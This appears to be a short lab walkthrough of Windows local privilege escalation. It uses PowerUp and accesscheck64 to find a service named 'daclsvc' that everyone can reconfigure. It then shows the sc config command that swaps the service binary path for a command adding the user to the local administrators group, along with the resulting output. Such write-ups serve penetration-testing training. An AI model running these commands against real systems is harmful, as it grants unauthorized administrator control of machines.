If we have permissions to change the configuration of services then we can change the config to execute any command we want.

Discovering services with weak permissions using Powerup:

powershell -ep bypass
. .\Powerup.ps1
Invoke-AllChecks

Looking closer at the service with accesscheck64 we can see that the “everyone” group has permissions to change the config and stop and start the service.

accesscheck64.exe -wuvc daclsvc

Querying the service and config with “sc query daclsvs” and “sc qc daclsvc”

We can change the “BINARY_PATH_NAME” to any command we like and it will be executed when we start the service. Lets add ourselfs to the administrators group:

sc config daclsvc binpath= "net localgroup administrators user /add"

Start the service

sc start daclsvc

C:\Users\>net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
user
The command completed successfully.